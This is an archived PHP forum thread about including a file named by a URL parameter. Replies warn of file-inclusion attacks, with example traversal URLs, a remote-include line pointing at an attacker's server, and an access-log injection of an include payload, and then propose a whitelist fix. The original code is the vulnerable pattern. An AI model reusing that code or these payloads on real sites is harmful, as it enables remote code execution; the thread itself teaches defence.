Hi All
I've tried as many combinations as I can think of but I'm not getting any
where. This is what I have:
<?
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
?>
I've tried this with the full URL of the inc file as well which just
contains some HTML.
I then have:
<td><?php require'$menu'; ?></td>
I've tried:
<?php require('$menu'); ?>
<?php require($menu); ?>
<?php require'$menu'; ?>
<?php include('$menu'); ?>
<?php include($menu); ?>
<?php include'$menu'; ?>
It echoes the $menu string correctly but it either just truncates at <td> or
it displays the rest of the page but I just get <td></td>
Can someone point me in the right direction please.
Best
Andy 9 2279
Andy Jacobs wrote: Hi All
I've tried as many combinations as I can think of but I'm not getting any where. This is what I have:
<? $menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc'; echo $menu; ?>
I've tried this with the full URL of the inc file as well which just contains some HTML.
I then have:
<td><?php require'$menu'; ?></td>
I've tried:
<?php require('$menu'); ?> <?php require($menu); ?> <?php require'$menu'; ?> <?php include('$menu'); ?> <?php include($menu); ?> <?php include'$menu'; ?>
It echoes the $menu string correctly but it either just truncates at <td> or it displays the rest of the page but I just get <td></td>
Can someone point me in the right direction please.
Best
Andy
Wow,
No one can say you didn't try! Firstly, don't use HTTP_GET_VARS or the
like as they are depreciated. Use instead the newer $_GET, $_POST, $_SERVER.
The correct what to include/require a file is with require() or
include(). So both the first two requires would work as well as the
first two includes.
I wonder if it's not working because the path is wrong? If you are not
seeing an error, then your error reporting is turned off (as is the
default with newer versions of PHP if I remember correctly). Check out http://us3.php.net/errorfunc and turn on error reporting for now.
HTH,
Joe
In article <8z_%d.4000$%d7.2439@lakeread03>,
Joe Webster <jo*@cawfeemilk.com> wrote: Andy Jacobs wrote: Hi All
I've tried as many combinations as I can think of but I'm not getting any where. This is what I have:
<? $menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc'; echo $menu; ?>
I've tried this with the full URL of the inc file as well which just contains some HTML.
I then have:
<td><?php require'$menu'; ?></td>
I've tried:
<?php require('$menu'); ?> <?php require($menu); ?> <?php require'$menu'; ?> <?php include('$menu'); ?> <?php include($menu); ?> <?php include'$menu'; ?>
It echoes the $menu string correctly but it either just truncates at <td> or it displays the rest of the page but I just get <td></td>
Can someone point me in the right direction please.
Best
Andy Wow,
No one can say you didn't try! Firstly, don't use HTTP_GET_VARS or the like as they are depreciated. Use instead the newer $_GET, $_POST, $_SERVER.
The correct what to include/require a file is with require() or include(). So both the first two requires would work as well as the first two includes.
I wonder if it's not working because the path is wrong? If you are not seeing an error, then your error reporting is turned off (as is the default with newer versions of PHP if I remember correctly). Check out http://us3.php.net/errorfunc and turn on error reporting for now.
HTH, Joe
Remember the old game of mastermind with little pegs? If you do then I
think this was what I was doing. I had one part right and 3 wrong. I
fixed one of the 3 wrong parts and then broke the one right part. One
of these being to actually upload the include files - ooops!
Anyway, thanks for the input. I must get into the habit of user the
newer variables!
Cheers
Andy
Andy Jacobs wrote: In article <8z_%d.4000$%d7.2439@lakeread03>, Joe Webster <jo*@cawfeemilk.com> wrote:
Andy Jacobs wrote:
Hi All
I've tried as many combinations as I can think of but I'm not getting any where. This is what I have:
<? $menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc'; echo $menu; ?>
I've tried this with the full URL of the inc file as well which just contains some HTML.
I then have:
<td><?php require'$menu'; ?></td>
I've tried:
<?php require('$menu'); ?> <?php require($menu); ?> <?php require'$menu'; ?> <?php include('$menu'); ?> <?php include($menu); ?> <?php include'$menu'; ?>
It echoes the $menu string correctly but it either just truncates at <td> or it displays the rest of the page but I just get <td></td>
Can someone point me in the right direction please.
Best
Andy
Wow,
No one can say you didn't try! Firstly, don't use HTTP_GET_VARS or the like as they are depreciated. Use instead the newer $_GET, $_POST, $_SERVER.
The correct what to include/require a file is with require() or include(). So both the first two requires would work as well as the first two includes.
I wonder if it's not working because the path is wrong? If you are not seeing an error, then your error reporting is turned off (as is the default with newer versions of PHP if I remember correctly). Check out http://us3.php.net/errorfunc and turn on error reporting for now.
HTH, Joe Remember the old game of mastermind with little pegs? If you do then I think this was what I was doing. I had one part right and 3 wrong. I fixed one of the 3 wrong parts and then broke the one right part. One of these being to actually upload the include files - ooops!
Anyway, thanks for the input. I must get into the habit of user the newer variables!
Cheers
Andy
Gremlins
Andy Jacobs wrote: $menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc'; echo $menu;
[snip] <?php require($menu); ?>
Be very careful when doing things like this; if someone can inject a
file with an ".inc" extension somewhere onto your filesystem they can
execute it by calling your script something like this: http://example.com/script.php?menu=....tmp/attack.inc
If there are existing .inc files on the system in known locations, they
can be executed (if PHP) or read (if not PHP) this way even without the
ability to upload files onto the system.
Note that it could be even worse: if you weren't prepending a directory
name, and allow_url_fopen is on (as default) the attacker could specify
a URL to an external web server, executing arbitrary PHP code on your
machine without needing any initial access to lay the attack groundwork.
You should always carefully validate input before using it this way.
-- brion vibber (brion @ pobox.com)
I am having trouble grasping how an attack program would do something
like this. Can anyone give me a better general basic understanding so
that I can more logically avoid the problems it poses when designing my
code?
thanks very much http://example.com/script.php?menu=....tmp/attack.inc
If there are existing .inc files on the system in known locations, they
can be executed (if PHP) or read (if not PHP) this way even without the
ability to upload files onto the system.
Note that it could be even worse: if you weren't prepending a directory
name, and allow_url_fopen is on (as default) the attacker could specify
a URL to an external web server, executing arbitrary PHP code on your
machine without needing any initial access to lay the attack groundwork.
I create, on some web server (not yours) a page called foo.inc. Assume
you weren't prepending a directory name to $menu. When I go to your
page, I go to (supposing the URL after the ? is properly URL-encoded): http://yourdomainname.com/somepage.p...inname.com/foo
Now your page takes that menu parameter, takes the value of it, appends
..inc, and you basically have, in your script:
require("http://mydomainname.com/foo.inc");
which means that the page living on my server was just executed in the
context of your script (on your server). Who knows what it could do?
The point is you don't know.
In general, I would stay away from including files who's names are
based on parameters from an HTTP request.
Here's my simple solution:
/*
* By defining each acceptable $page value below, you prevent hackers
* including executable code in the URL
*/
$unsecure_pages = array('login','tos','signup','copyright','privacy' );
$secure_pages = array('home','faq', 'domains');
/* check for login on secure pages here */
<snip>
/* get the include */
$ok_pages = array_merge($unsecure_pages, $secure_pages);
if ( in_array ($page, $ok_pages )) {
if(include_once ($tpath . $page . ".inc.php")) {
echo '';
} else {
die("Property Display Could Not Locate the Page ('$page')");
}
} else {
log_out();
exit;
}
You should also be naming your includes as .php so if someone does get one
to pop up, it gets processed by your server first rather than just showing
all your code which may include passwords and such.
hth,
John
"ZeldorBlat" <ze********@gmail.com> wrote in message
news:11**********************@g14g2000cwa.googlegr oups.com... I create, on some web server (not yours) a page called foo.inc. Assume you weren't prepending a directory name to $menu. When I go to your page, I go to (supposing the URL after the ? is properly URL-encoded):
http://yourdomainname.com/somepage.p...inname.com/foo
Now your page takes that menu parameter, takes the value of it, appends .inc, and you basically have, in your script:
require("http://mydomainname.com/foo.inc");
which means that the page living on my server was just executed in the context of your script (on your server). Who knows what it could do? The point is you don't know.
In general, I would stay away from including files who's names are based on parameters from an HTTP request.
"Brion Vibber" <br***@pobox.com> wrote in message
news:3a*************@individual.net... Andy Jacobs wrote: $menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc'; echo $menu; [snip] <?php require($menu); ?>
Be very careful when doing things like this; if someone can inject a file with an ".inc" extension somewhere onto your filesystem they can execute it by calling your script something like this:
http://example.com/script.php?menu=....tmp/attack.inc
The attacker could just inject PHP code into the Apache access log by going
to links in the form of http://www.dingo.net/<?include('http://...')?>, then
make PHP include the access log. It might take a while to parse but
eventually PHP would execute the statement.
Tex John wrote: You should also be naming your includes as .php so if someone does get one to pop up, it gets processed by your server first rather than just showing all your code which may include passwords and such.
A warning is in order here, though: you need to code on the assumption
that any of your .php files can be directly executed, so you need to
make sure they are individually safe to run. Consider output, filesystem
or database side effects, use of global variables (register_globals
vulnerabilities), etc.
One very simple way is to only have known entry point scripts with
actual runnable code, and have all others be function and class
declarations only.
It's safer still to keep your include files outside of the web server's
document root; you can set PHP's include_path for convenience.
-- brion vibber (brion @ pobox.com) This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics |
by: Cartensy |
last post by:
Hi, I try to configure a php applic to load a config file (the purpose is to
use in all the php pages variables definied in a config file)
Here is a small example which describe my problem:
My...
|
by: Zaan |
last post by:
www.entropy.ch release for Mac OS
X.]
Hello,
My issue is the following: to promote consistency on a site I'm
building, I decided to go for a php scheme where some recurring
elements...
|
by: james |
last post by:
I can't seem to access sessions variables from include files.
If I use the include file like this it I cant get the session
variables:
<?php
session_start();
require("url/to/inc/file.php");...
|
by: Sean Pinto |
last post by:
Ok, you all are going to have to bear with me on this one as it is
kinda complicated to explain. I am implementing a company management
suite that requires Role-Based authentiations (ie. users are...
|
by: Will |
last post by:
I know I am searching using the wrong words because I can't seem to find
a simple answer on this. Here's what I want to do.
helper.inc
<!php
var $fileName2;
class helper {
function...
| |
by: Mike |
last post by:
I'm new to PHP - moving over from ASP.
I have a number of include files, the first of which sets the value of
a variable $loginmsg. I use that variable in a subsequent include
file, but get a...
|
by: Bob Bedford |
last post by:
HI all,
Weird problem....
in the file queries.inc.php I've this:
$query = 'select * from list where content = '.$idcontent;
I've this code in my page:
$idcontent = 15;...
|
by: SoulIntruder |
last post by:
Hello folks.
I have a beginners question.
I have such script:
<?php
$User = $_POST;
$Password = $_POST;
$Database = $_POST;
|
by: Mark |
last post by:
so, i'm making a website. let's say i have header.php, footer.php and
content.php.
now in index.php I simply want to include the 3 pages. easy enough to
do.
but let's say the user navigates to...
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
|
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers,...
| |
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...
|
by: tracyyun |
last post by:
Dear forum friends,
With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each...
|
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing,...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome a new...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and...
|
by: TSSRALBI |
last post by:
Hello
I'm a network technician in training and I need your help.
I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs.
The...
| |
by: muto222 |
last post by:
How can i add a mobile payment intergratation into php mysql website.
| |